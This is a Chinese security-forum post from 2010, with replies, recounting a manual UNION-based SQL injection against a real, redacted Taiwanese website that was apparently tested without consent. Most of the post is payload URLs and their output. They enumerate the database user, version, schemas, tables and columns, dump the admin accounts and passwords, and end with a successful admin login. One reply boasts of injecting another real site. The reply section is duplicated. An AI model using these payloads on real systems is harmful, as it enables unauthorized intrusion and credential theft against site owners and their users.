[原创]一次手动php注入全程-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]一次手动php注入全程

发表于: 2010-11-28 15:24 13515

[原创]一次手动php注入全程

Possible

2010-11-28 15:24

13515

作者：天下黑客联盟菜菜
论坛：http://www.txhack.com/

本次注入只是友情检测，联盟菜菜宣传黑客联盟，宣传网络安全，希望每个人都提高安全意识，打造安全的网站环境...技术本身没有对错，希望略懂技术的人不要做恶搞网站，学习一下即可!
现将检测过程写在如下：
http://www.***.com.tw/news.php?id=-30+union+select+1,2,concat_ws(0x3A,user(),database(),version(),@@basedir,@@datadir),4,5

metroasis@localhost:
metroasis:
5.1.41-3ubuntu12:
/usr/:
/var/lib/mysql/

查看数据库列表

http://www.***.com.tw/news.php?id=-30+union+select+1,2,group_concat(schema_name),4,5/**/from/**/information_schema.schemata

information_schema,metroasis

http://www.***.com.tw/news.php?id=-30+union+select+1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='metroasis'

about,admin,banner,blockip,brand,catalog,common,contact,context,formdata

http://www.***.com.tw/news.php?id=-30+union+select+1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='admin'

id,account,passwd

http://www.***.com.tw/news.php?id=-30+union+select+1,2,group_concat(account,0x3a,passwd),4,5 from admin

http://www.***.com.tw/admin 登录成功

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

收藏・7

免费・0

支持

最新回复 (22)
adomore 雪币： 189 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 481 粉丝 0 关注私信	adomore 2 楼 bacuobacuo! 2010-11-28 16:19 0
冷煞xiaosan 雪币： 291 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 265 粉丝 0 关注私信	冷煞xiaosan 3 楼额的个神...还以为是啥子呢~ 2010-11-28 17:47 0
chenchsha 雪币： 4419 活跃值： (894) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 66 粉丝 0 关注私信	chenchsha 4 楼学习学习哈``````````` 2010-11-28 18:13 0
getbugs 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	getbugs 5 楼一个不错的实例呵呵 2010-12-6 19:26 0
bora 雪币： 230 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	bora 6 楼多学点知识是没有错误的。 2010-12-10 11:40 0
Possible 雪币： 87 活跃值： (25) 能力值： ( LV6，RANK：80 ) 在线值：发帖 30 回帖 147 粉丝 1 关注私信	Possible 7 楼谢谢各位互相学习 2010-12-16 20:29 0
DeBugZero 雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 31 粉丝 0 关注私信	DeBugZero 8 楼类似的文章网上一搜一大把。话说回来，web安全这，似乎是越来越不安全。期待web2.0时代的发展，呵呵~~ 2011-2-13 09:51 0
appwho 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	appwho 9 楼的确很是点不安全 2011-2-16 17:22 0
Lodd 雪币： 1240 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 148 粉丝 0 关注私信	Lodd 10 楼 PHP默认都是过滤表单里的单引号的我想问，这个如何破解？ 2011-3-12 01:22 0
黑骑士boy 雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 42 粉丝 1 关注私信	黑骑士boy 11 楼學習了。........ 2011-3-14 11:26 0
ioton 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	ioton 12 楼手工也就那样吧。。 2011-3-29 16:26 0
asdfqqwez 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	asdfqqwez 13 楼想請問下group_concat()這個函數是做甚麼用的 2011-4-26 16:46 0
return 雪币： 50 活跃值： (73) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 109 粉丝 0 关注私信	return 14 楼这个过程的开头其实忽略了很多关键性的东西，比如猜表的过程和为什么选择3#来进行用户名、数据库版本、目录等的显示。整个注入过程隐藏了很多关键信息，实战手工注入是没有那么简单滴，估计被原创作者编辑过。从内容来看，我个人认为：名为教程，实际可能有显摆的意思了吧，真正想学习的朋友通过此文是学不到什么的，实用价值不大。但还是要感谢楼主的分享！前几天注射了国外某著名足球俱乐部官方网站，如果有机会和新接触web安全的朋友讨论下。 2011-8-6 12:12 0
猥琐菜鸟雪币： 102 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 94 粉丝 0 关注私信	猥琐菜鸟 15 楼肯定..稍微关键的部分都会隐藏...不懂的人,旁边叫好..牛B..好..强..就这样. 2011-8-6 12:33 0
辰凌风雪币： 152 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	辰凌风 16 楼额，这个缺少了很多东东呀。。楼主分享的精神是不错，不过如果能写出详细的过程，那就更好了，对那些初学者也才能真正的有帮助。 2011-8-19 21:44 0
rose 雪币： 101 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	rose 17 楼是啊，分析和判断注入情况 2011-10-22 22:41 0
Possible 雪币： 87 活跃值： (25) 能力值： ( LV6，RANK：80 ) 在线值：发帖 30 回帖 147 粉丝 1 关注私信	Possible 18 楼好的，有时间补上大家所希望内容，只是本人也是初学者，还需要大家多多指点... 2011-11-14 09:24 0
熊大雪币： 6 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 28 粉丝 0 关注私信	熊大 19 楼其实，我想说。你说的没错&&& 2013-10-6 17:27 0
黑色舞曲雪币： 1423 活跃值： (702) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 178 粉丝 0 关注私信	黑色舞曲 20 楼百度文库一大把，比这个详细~ 2013-10-18 10:07 0
Mxhacks 雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	Mxhacks 21 楼膜拜大大啊！ 2013-10-25 03:13 0
petersonhz 雪币： 2375 活跃值： (433) 能力值： ( LV2，RANK：10 ) 在线值：发帖 422 回帖 2433 粉丝 0 关注私信	petersonhz 22 楼感觉猜表十分困难，运气很重要，呵呵 2013-10-26 03:25 0
bluextb 雪币： 30 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	bluextb 23 楼新手来学习下，感谢您详细的讲解 2013-10-27 00:11 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Possible

发帖

147

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (22)
adomore 雪币： 189 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 481 粉丝 0 关注私信	adomore 2 楼 bacuobacuo! 2010-11-28 16:19 0
冷煞xiaosan 雪币： 291 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 265 粉丝 0 关注私信	冷煞xiaosan 3 楼额的个神...还以为是啥子呢~ 2010-11-28 17:47 0
chenchsha 雪币： 4419 活跃值： (894) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 66 粉丝 0 关注私信	chenchsha 4 楼学习学习哈``````````` 2010-11-28 18:13 0
getbugs 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	getbugs 5 楼一个不错的实例呵呵 2010-12-6 19:26 0
bora 雪币： 230 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	bora 6 楼多学点知识是没有错误的。 2010-12-10 11:40 0
Possible 雪币： 87 活跃值： (25) 能力值： ( LV6，RANK：80 ) 在线值：发帖 30 回帖 147 粉丝 1 关注私信	Possible 7 楼谢谢各位互相学习 2010-12-16 20:29 0
DeBugZero 雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 31 粉丝 0 关注私信	DeBugZero 8 楼类似的文章网上一搜一大把。话说回来，web安全这，似乎是越来越不安全。期待web2.0时代的发展，呵呵~~ 2011-2-13 09:51 0
appwho 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	appwho 9 楼的确很是点不安全 2011-2-16 17:22 0
Lodd 雪币： 1240 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 148 粉丝 0 关注私信	Lodd 10 楼 PHP默认都是过滤表单里的单引号的我想问，这个如何破解？ 2011-3-12 01:22 0
黑骑士boy 雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 42 粉丝 1 关注私信	黑骑士boy 11 楼學習了。........ 2011-3-14 11:26 0
ioton 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	ioton 12 楼手工也就那样吧。。 2011-3-29 16:26 0
asdfqqwez 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	asdfqqwez 13 楼想請問下group_concat()這個函數是做甚麼用的 2011-4-26 16:46 0
return 雪币： 50 活跃值： (73) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 109 粉丝 0 关注私信	return 14 楼这个过程的开头其实忽略了很多关键性的东西，比如猜表的过程和为什么选择3#来进行用户名、数据库版本、目录等的显示。整个注入过程隐藏了很多关键信息，实战手工注入是没有那么简单滴，估计被原创作者编辑过。从内容来看，我个人认为：名为教程，实际可能有显摆的意思了吧，真正想学习的朋友通过此文是学不到什么的，实用价值不大。但还是要感谢楼主的分享！前几天注射了国外某著名足球俱乐部官方网站，如果有机会和新接触web安全的朋友讨论下。 2011-8-6 12:12 0
猥琐菜鸟雪币： 102 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 94 粉丝 0 关注私信	猥琐菜鸟 15 楼肯定..稍微关键的部分都会隐藏...不懂的人,旁边叫好..牛B..好..强..就这样. 2011-8-6 12:33 0
辰凌风雪币： 152 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	辰凌风 16 楼额，这个缺少了很多东东呀。。楼主分享的精神是不错，不过如果能写出详细的过程，那就更好了，对那些初学者也才能真正的有帮助。 2011-8-19 21:44 0
rose 雪币： 101 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	rose 17 楼是啊，分析和判断注入情况 2011-10-22 22:41 0
Possible 雪币： 87 活跃值： (25) 能力值： ( LV6，RANK：80 ) 在线值：发帖 30 回帖 147 粉丝 1 关注私信	Possible 18 楼好的，有时间补上大家所希望内容，只是本人也是初学者，还需要大家多多指点... 2011-11-14 09:24 0
熊大雪币： 6 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 28 粉丝 0 关注私信	熊大 19 楼其实，我想说。你说的没错&&& 2013-10-6 17:27 0
黑色舞曲雪币： 1423 活跃值： (702) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 178 粉丝 0 关注私信	黑色舞曲 20 楼百度文库一大把，比这个详细~ 2013-10-18 10:07 0
Mxhacks 雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	Mxhacks 21 楼膜拜大大啊！ 2013-10-25 03:13 0
petersonhz 雪币： 2375 活跃值： (433) 能力值： ( LV2，RANK：10 ) 在线值：发帖 422 回帖 2433 粉丝 0 关注私信	petersonhz 22 楼感觉猜表十分困难，运气很重要，呵呵 2013-10-26 03:25 0
bluextb 雪币： 30 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	bluextb 23 楼新手来学习下，感谢您详细的讲解 2013-10-27 00:11 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复